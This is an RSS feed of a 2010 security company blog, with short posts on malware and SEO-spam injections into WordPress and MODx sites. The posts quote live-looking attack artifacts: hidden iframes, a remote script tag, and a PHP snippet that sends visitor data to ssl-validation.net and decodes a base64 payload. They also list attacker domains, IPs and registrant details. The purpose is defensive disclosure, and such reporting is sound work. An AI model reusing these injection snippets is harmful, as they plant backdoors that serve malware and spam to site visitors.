<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Sucuri</title>
	
	<link>http://blog.sucuri.net</link>
	<description>Protect Your Interwebs</description>
	<lastBuildDate>Wed, 08 Sep 2010 19:27:57 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SucuriSecurity" /><feedburner:info uri="sucurisecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Success Magazine Blog Hit With Malware</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/CyXw4cF4-CQ/success-magazine-hit-with-malware.html</link>
		<comments>http://blog.sucuri.net/2010/09/success-magazine-hit-with-malware.html#comments</comments>
		<pubDate>Wed, 08 Sep 2010 19:21:37 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=837</guid>
		<description><![CDATA[We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine). We conducted a quick &#8230; <a href="http://blog.sucuri.net/2010/09/success-magazine-hit-with-malware.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from <strong><i>blog.success.com</i></strong> (the official blog of Success Magazine). </p>
<p>We conducted a quick scan of their blog, we can see that it is being used to load all sorts of Pharma goodness:</p>
<p><a href="http://2.bp.blogspot.com/_w4XYN7NmRts/TIfcs6Mt2II/AAAAAAAAAJ4/nwZslhh2O6Q/s1600/success1.gif" rel="lightbox"><img alt="Success spam" src="http://2.bp.blogspot.com/_w4XYN7NmRts/TIfcs6Mt2II/AAAAAAAAAJ4/nwZslhh2O6Q/s1600/success1.gif" title="Success spam" class="alignnone" width="746" height="412" /></a><br />
<span id="more-837"></span><br />
By searching Google we can confirm (&quot;Buy&nbsp; Naltrexone&quot; inurl:blog.success.com) that it has been there for a while:</p>
<p><a href="http://2.bp.blogspot.com/_w4XYN7NmRts/TIfeBcBvCJI/AAAAAAAAAKA/-4feWs-nbD0/s1600/success1a.gif" rel="lightbox"><img alt="Success.com spam on google" src="http://2.bp.blogspot.com/_w4XYN7NmRts/TIfeBcBvCJI/AAAAAAAAAKA/-4feWs-nbD0/s1600/success1a.gif" title="Success.com spam on google" class="alignnone" width="600" height="439" /></a></p>
<p>We cannot emphasize enough how important it is to keep your web software and applications up to date. This includes your themes and plugins as well! In the case of Success Magazine, they are using WordPress v2.7.1, which is outdated and has known security bugs:</p>
<p><a href="http://4.bp.blogspot.com/_w4XYN7NmRts/TIfeXLuCaNI/AAAAAAAAAKI/790z8-EmV_I/s1600/success2.gif"><img alt="" src="http://4.bp.blogspot.com/_w4XYN7NmRts/TIfeXLuCaNI/AAAAAAAAAKI/790z8-EmV_I/s1600/success2.gif" class="alignnone" width="638" height="275" /></a></p>
<p>We already contacted them and hopefully they&#8217;ll get it squared away quickly. Situations like these should be a wake up call for blog owners that are using outdated versions of WordPress (or any application): Update ias soon as possible. Every day that goes by when running outdated software increases your risk of being hacked. It&#8217;s just bad for business, ultimately you may be putting visitors at risk and that&#8217;s a quick way to permanently lose traffic!</p>
<p>Protect your interwebs!</p>

<p><a href="http://feedads.g.doubleclick.net/~a/VZQUrOMdkmN_iQgBNKX1RKaVvuc/0/da"><img src="http://feedads.g.doubleclick.net/~a/VZQUrOMdkmN_iQgBNKX1RKaVvuc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/VZQUrOMdkmN_iQgBNKX1RKaVvuc/1/da"><img src="http://feedads.g.doubleclick.net/~a/VZQUrOMdkmN_iQgBNKX1RKaVvuc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/CyXw4cF4-CQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/09/success-magazine-hit-with-malware.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/09/success-magazine-hit-with-malware.html</feedburner:origLink></item>
		<item>
		<title>Modx and the new gcounter.cn attack</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/gL_QNfpONjE/modx-and-the-new-gcounter-cn-attack.html</link>
		<comments>http://blog.sucuri.net/2010/09/modx-and-the-new-gcounter-cn-attack.html#comments</comments>
		<pubDate>Tue, 07 Sep 2010 14:36:54 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[malware_updates]]></category>
		<category><![CDATA[modx]]></category>
		<category><![CDATA[hacked]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=747</guid>
		<description><![CDATA[Quick malware update. See all the latest ones here. We are seeing lately many sites running Modx that are infected with a malware getting loaded from the file /manager/includes/document.parser.class.inc.php. We don&#8217;t know yet how the sites are being hacked, but &#8230; <a href="http://blog.sucuri.net/2010/09/modx-and-the-new-gcounter-cn-attack.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><i>Quick malware update. See all the latest ones <a href="http://blog.sucuri.net/category/malware_updates">here</a>.</i></p>
<p>We are seeing lately many sites running Modx that are infected with a malware getting loaded from the file <em>/manager/includes/document.parser.class.inc.php</em>.</p>
<p>We don&#8217;t know yet how the sites are being hacked, but the interesting thing is that all of them are being &#8220;managed&#8221; by gcounter.cn (a famous malware site).</p>
<p>Basically a big code is added to the bottom of that file to call gcounter.cn to get what malicious iframe to send to the end user. Gcounter then responds with the proper one to load:</p>
<blockquote><p>
&lt; i frame src=&#8221;http://sslsite.in/x/?src=Sirius&#038;id=zerling&#038;o=o&#8221; style=&#8221;display:none&#8221;&gt;
</p></blockquote>
<p><span id="more-747"></span><br />
or</p>
<blockquote><p>
&lt; i frame src=&#8221;http://freematrix.in/x/?src=Sirius&#038;id=zerling&#038;o=o&#8221; style=&#8221;display:none&#8221;&gt;
</p></blockquote>
<p>or</p>
<blockquote><p>
&lt; i frame src=&#8221;http://solid-success.in/x/?src=Sirius&#038;id=zerling&#038;o=o&#8221; style=&#8221;display:none&#8221;&gt;
</p></blockquote>
<p>or</p>
<blockquote><p>
&lt; i frame src=&#8221;http://computerengine.in/x/?src=Sirius&#038;id=zerling&#038;o=o&#8221; style=&#8221;display:none
</p></blockquote>
<p>List of sites being used in this attack:</p>
<blockquote>
<p>http://sslsite.in</p>
<p>http://freematrix.in/</p>
<p>http://solid-success.in/</p>
<p>http://basicreader.in/</p>
<p>http://computerengine.in/</p>
<p>http://easyclick.in/</p>
<p>http://enginecollector.in/</p>
<p>http://shieldsearch.in/</p>
<p>http://solidpool.in/</p>
<p>http://auto-booster.in/</p>
<p>http://rapid-debug.in/</p>
<p>http://06.1099hsd.co.cc/</p>
<p>http://06.dsdtsdz.co.cc/</p>
</blockquote>
<p>Code decoded: <a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=42d63a94574be7e43de1232cf53cc9be">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=42d63a94574be7e43de1232cf53cc9be</a></p>
<p>We will post more details as we learn more about this attack.</p>
<p><b><br />
If your site is hacked and you need help, visit <a href="http://sucuri.net">http://sucuri.net</a> to learn about our malware removal and monitoring plans.<br />
</b></p>

<p><a href="http://feedads.g.doubleclick.net/~a/5-YHUgRe7_6xniB_zl3SUg2K50o/0/da"><img src="http://feedads.g.doubleclick.net/~a/5-YHUgRe7_6xniB_zl3SUg2K50o/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/5-YHUgRe7_6xniB_zl3SUg2K50o/1/da"><img src="http://feedads.g.doubleclick.net/~a/5-YHUgRe7_6xniB_zl3SUg2K50o/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/gL_QNfpONjE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/09/modx-and-the-new-gcounter-cn-attack.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/09/modx-and-the-new-gcounter-cn-attack.html</feedburner:origLink></item>
		<item>
		<title>Malware update – ssl-validation.net</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/To03Q2EodaU/malware-update-ssl-validation-net.html</link>
		<comments>http://blog.sucuri.net/2010/09/malware-update-ssl-validation-net.html#comments</comments>
		<pubDate>Fri, 03 Sep 2010 19:45:12 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[malware_updates]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=821</guid>
		<description><![CDATA[Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain&#8217;t so). You can get details of the code being used here: http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7ea73e3ac775b52b945d5b45a5abb7ad $outsourceurl=&#34;http://ssl-validation.net/gt.php?site=&#8221;.urlencode($_SERVER['HTTP_HOST']).&#8217;&#038;page=&#8217;.urlencode($_SERVER['REQUEST_URI']).&#8217;&#038;ip=&#8217;.urlencode($_SERVER['REMOTE_ADDR']).&#8217;&#038;agent=&#8217;.urlencode($_SERVER['HTTP_USER_AGENT']); $links = base64_decode(file_get_contents($outsourceurl)); &#8230; <a href="http://blog.sucuri.net/2010/09/malware-update-ssl-validation-net.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>Quick malware update: The site <strong>ssl-validation.net </strong>(nice name) is being used to distribute <a href="http://blog.sucuri.net/tag/spam">SEO spam</a> and malware (Rhe famous fake AV, say it ain&#8217;t so).</p>
<p>You can get details of the code being used here: <a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7ea73e3ac775b52b945d5b45a5abb7ad">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7ea73e3ac775b52b945d5b45a5abb7ad</a></p>
<blockquote><p>$outsourceurl=&quot;http://ssl-validation.net/gt.php?site=&#8221;.urlencode($_SERVER['HTTP_HOST']).&#8217;&#038;page=&#8217;.urlencode($_SERVER['REQUEST_URI']).&#8217;&#038;ip=&#8217;.urlencode($_SERVER['REMOTE_ADDR']).&#8217;&#038;agent=&#8217;.urlencode($_SERVER['HTTP_USER_AGENT']);<br />
$links = base64_decode(file_get_contents($outsourceurl));</p></blockquote>
<p>Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress. </p>
<p>The malicious site is hosted at 95.211.108.146.</p>
<p>Suggestion for hosting companies: <strong>Block this IP</strong>.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/sAFdIoAjKZNT4c7ZURuQBoyazBE/0/da"><img src="http://feedads.g.doubleclick.net/~a/sAFdIoAjKZNT4c7ZURuQBoyazBE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/sAFdIoAjKZNT4c7ZURuQBoyazBE/1/da"><img src="http://feedads.g.doubleclick.net/~a/sAFdIoAjKZNT4c7ZURuQBoyazBE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/To03Q2EodaU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/09/malware-update-ssl-validation-net.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/09/malware-update-ssl-validation-net.html</feedburner:origLink></item>
		<item>
		<title>Malware update – seconeo.com,secowo.com,etc</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/X_5vBF413C0/malware-update-seconeo-comsecowo-cometc.html</link>
		<comments>http://blog.sucuri.net/2010/09/malware-update-seconeo-comsecowo-cometc.html#comments</comments>
		<pubDate>Fri, 03 Sep 2010 19:11:28 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[malware_updates]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=815</guid>
		<description><![CDATA[We will be posting some quick malware updates on our blog from now on. If your WordPress site got hacked with malware from any of these domains: http://ae.awaue.com http://ie.eracou.com http://ao.euuaw.com http://aeaaea.com/ou http://secree.com/re http://uoauer.com/si http://oeooea.com/ve http://secowo.com/wo http://ouroue.com/se In addition to remove &#8230; <a href="http://blog.sucuri.net/2010/09/malware-update-seconeo-comsecowo-cometc.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><i>We will be posting some quick malware updates on our blog from now on.</i> If your WordPress site got <a href="http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html">hacked</a> with <a href="http://sucuri.net/malware/entry/MW:RKS:3">malware</a> from any of these domains:</p>
<blockquote>
<p>http://ae.awaue.com</p>
<p>http://ie.eracou.com</p>
<p>http://ao.euuaw.com</p>
<p>http://aeaaea.com/ou</p>
<p>http://secree.com/re</p>
<p>http://uoauer.com/si</p>
<p>http://oeooea.com/ve</p>
<p>http://secowo.com/wo</p>
<p>http://ouroue.com/se</p>
</blockquote>
<p>In addition to remove the malicious code from the database (wp-posts table), you also need to remove an admin user that was added as part of this attack. It can have many names: JordanK, JoshuaH, MikeM, BettyJ, etc.</p>
<p>The way to identify the malicious user name is that his password will be set to <i>$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/</i> and the creation date will be set to <i>0000-00-00 00:00:00</i>.</p>
<p>The following SQL will fix it up:</p>
<blockquote><p>
delete from wp_users where user_pass = &#8216;$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/&#8217; AND user_registered = &#8217;0000-00-00 00:00:00&#8242;;
</p></blockquote>
<p>We will be posting more details as we get them.</p>
<p>If your site is hacked and you need help, visit <a href="http://sucuri.net/">http://sucuri.net</a> to learn about our malware removal and monitoring plans.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/IUbMm63wiRLxcRGYhgeoC5Twjv0/0/da"><img src="http://feedads.g.doubleclick.net/~a/IUbMm63wiRLxcRGYhgeoC5Twjv0/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/IUbMm63wiRLxcRGYhgeoC5Twjv0/1/da"><img src="http://feedads.g.doubleclick.net/~a/IUbMm63wiRLxcRGYhgeoC5Twjv0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/X_5vBF413C0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/09/malware-update-seconeo-comsecowo-cometc.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/09/malware-update-seconeo-comsecowo-cometc.html</feedburner:origLink></item>
		<item>
		<title>Malware update – Alex Bodrov – awaue.com,etc</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/3tiws9LQMFw/malware-update-alex-bodrov-awaue-cometc.html</link>
		<comments>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html#comments</comments>
		<pubDate>Tue, 31 Aug 2010 15:15:24 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[malware_updates]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=805</guid>
		<description><![CDATA[We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the &#8230; <a href="http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:</p>
<blockquote>
<p>http://aeaaea.com/ou</p>
<p>http://secree.com/re</p>
<p>http://uoauer.com/si</p>
<p>http://oeooea.com/ve</p>
<p>http://secowo.com/wo</p>
</blockquote>
<p>Those were used in the first batch of attacks that happened a few weeks (months) ago:</p>
<blockquote>
<p>http://ae.awaue.com</p>
<p>http://ie.eracou.com</p>
<p>http://ao.euuaw.com</p>
</blockquote>
<p>Details about the malware:<br />
<a href="http://sucuri.net/malware/entry/MW:RKS:3">http://sucuri.net/malware/entry/MW:RKS:3</a></p>
<p>For hosting providers/security companies:<strong> Block the IP address 91.188.59.203</strong> &#8211; (it is hosting all those sites).<br />
<span id="more-805"></span><br />
Whois details:</p>
<blockquote><p>
Name: Alex Bodrov<br />
Address: Polubotka 19-10<br />
City: Chernigov<br />
Province/state: Chernigov region<br />
Country: UA<br />
Postal Code: 34586<br />
Phone: +48.7139123463<br />
Fax: +48.7139123463<br />
Email: alexbodrovqw@gmail.com<br />
<br />
Name: Alexandr Borisenko<br />
Address: Polubotka 81-38<br />
City: kiev<br />
Province/state: Kiev region<br />
Country: UA<br />
Postal Code: 45675<br />
Email: 3807345466632@gmail.com
</p></blockquote>
<p>We will post more details as we learn them.</p>
<hr />
<p>If your site is hacked and you need help, visit <a href="http://sucuri.net/">http://sucuri.net</a> to learn about our malware removal and monitoring plans.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/0/da"><img src="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/1/da"><img src="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/3tiws9LQMFw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html</feedburner:origLink></item>
		<item>
		<title>Hilary Kneber (part XI) – sippa.dottasink.net</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/w6d4SO-x3ZE/hilary-kneber-part-xi-sippa-dottasink-net.html</link>
		<comments>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html#comments</comments>
		<pubDate>Tue, 24 Aug 2010 03:30:46 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=796</guid>
		<description><![CDATA[Hilary Kneber (hilarykneber@yahoo.com) is at it again. We&#8217;ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net: &#60; script src = &#34;http://sippa.dottasink.net/music/indi.php&#8221;&#62;&#60;/script&#62; This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous &#8230; <a href="http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>Hilary Kneber (hilarykneber@yahoo.com) is at it again. We&#8217;ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:</p>
<blockquote><p>
&lt; script src = &quot;http://sippa.dottasink.net/music/indi.php&#8221;&gt;&lt;/script&gt;
</p></blockquote>
<p>This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous &#8220;fake AV&#8221; virus will be offered to him.</p>
<p>And guess who registered that domain?<br />
<span id="more-796"></span></p>
<blockquote><p>
$ whois dottasink.net<br />
..<br />
Registrant Contact:<br />
   HardSoft, inc<br />
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us</p>
<p>Administrative Contact:<br />
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us
</p></blockquote>
<p>Yes, the same group behind <strong><a href="http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html">&#8220;vancouvererrorsonfile</a></strong>, <strong><a href="http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html">whereisdudescars</a></strong> and various other attacks (losotrana.com, zettapetta.com, etc).</p>
<p>Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.</p>
<hr />
<p>If your site is hacked, this script should clean it up: <a href="http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html">wordpress-fix.php</a> or contact us for a <a href="http://sucuri.net">professional, hands on clean-up</a> (support@sucuri.net).</p>

<p><a href="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/0/da"><img src="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/1/da"><img src="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/w6d4SO-x3ZE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html</feedburner:origLink></item>
		<item>
		<title>More spam: Google-traffic-analytics.com C&amp;C server</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/Qp7xAMYRqpo/more-spam-google-traffic-analytics-com-cc-server.html</link>
		<comments>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html#comments</comments>
		<pubDate>Mon, 23 Aug 2010 17:27:10 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=682</guid>
		<description><![CDATA[We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com. And when this site went down, guess what is showing &#8230; <a href="http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://sucuri.net">We</a> have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: <b>http://www.google-traffic-analytics.com</b>. </p>
<p>And when this site went down, guess what is showing up on Google:<br />
<a href="http://3.bp.blogspot.com/_w4XYN7NmRts/THKq1TFxG9I/AAAAAAAAAJo/GYnOfZA72Hs/s1600/Picture+12.png" rel="lightbox'><img alt="Google list of Sites with spam" src="http://3.bp.blogspot.com/_w4XYN7NmRts/THKq1TFxG9I/AAAAAAAAAJo/GYnOfZA72Hs/s1600/Picture+12.png" title="Google list of Sites with spam" class="alignnone" width="706" height="788" /></a><br />
<span id="more-682"></span><br />
Yes, that&#8217;s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg  tadalafil, viagra, etc).</p>
<p>Just some of the affected sites:</p>
<blockquote><p>
www.archaeological.org (Archaeological Institute of America)<br />
www.energycenter.org (Center for sustainable Energy)<br />
www.ieta.org (International Emissions trading association)<br />
www.efpa-italia.org (European Financial planning association)<br />
www.memes.org<br />
www.ancbs.org<br />
www.grains.org<br />
summits.aberdeen.com<br />
www.scbar.org<br />
www.stpsb.org<br />
teamfocususa.org<br />
www.npg.org.uk<br />
www.brooklynwaldorf.org<br />
www.pcs.org<br />
www.nyew.org<br />
www.vrwa.org<br />
www.ior-institute.org<br />
summits.aberdeen.com<br />
www.greenway.org<br />
www.oldlife.org
</p></blockquote>
<p>Finding them on Google is pretty simple as well: <i>inurl:.org &#8221; 5mg tadalafil&#8221;</i> or you can also search for: <i>&#8220;http://www.google-traffic-analytics.com&#8221; &#8220;Warning: file_get_contents&#8221;</i> which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.</p>
<p>As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.</p>
<p>We will post more details when we have them.</p>
<hr />
<p>Need help with a hacked site? Check out <a href="http://sucuri.net">http://sucuri.net</a> for a complete malware removal and site monitoring solution.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/0/da"><img src="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/1/da"><img src="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/Qp7xAMYRqpo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html</feedburner:origLink></item>
		<item>
		<title>Gmail blacklisted by Spamhaus</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/8iWja2K0lrs/gmail-blacklisted-by-spamhaus.html</link>
		<comments>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 16:01:21 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[blacklisted]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=769</guid>
		<description><![CDATA[Update: Gmail not blacklisted anymore. It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor: &#60; OK: Host www.gmail.com clean. &#8212; &#62; WARN: &#8230; <a href="http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><b>Update: Gmail not blacklisted anymore.</b></p>
<p>It seems that today <a href="http://www.spamhaus.org">Spamhaus</a> (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our <a href="http://sucuri.net">blacklist monitor</a>:</p>
<blockquote><p>
&lt;    OK: Host www.gmail.com clean.<br />
&#8212;<br />
&gt;    WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21<br />
&gt;    WARN: Host www.gmail.com blacklisted.
</p></blockquote>
<p>Digging further:</p>
<blockquote><p>
$ host gmail.com<br />
gmail.com has address 74.125.227.24<br />
gmail.com has address 74.125.227.21<br />
gmail.com has address 74.125.227.22<br />
gmail.com has address 74.125.227.23
</p></blockquote>
<p><span id="more-769"></span><br />
Querying Spamhaus, we find:</p>
<blockquote><p>
<strong>74.125.227.21 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.22 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.23 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.24 is listed in the SBL</strong>, in the following records:
</p></blockquote>
<p>Here is the probable reason they were blocked:</p>
<blockquote><p>
<strong>Spam Operation: Canadian Pharmacy</strong><br />
74.125.227.0/24 is listed on the SBL as being assigned to, being under the control of, or being otherwise connected with a known spam operation listed on the ROKSO database as: Canadian Pharmacy
</p></blockquote>
<p>Looking for more details, it seems that spammers were using docs.google.com to post some documents, which are stored in the same /24 as gmail. Spamhaus decided to blacklist the whole subnet. Details:</p>
<blockquote><p>
writely.l.google.com<br />
Address: 74.125.227.1 &#8211; 74.125.227.15</p>
<p>Please stop supporting spammers.</p>
<p>You can start by removing the following.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
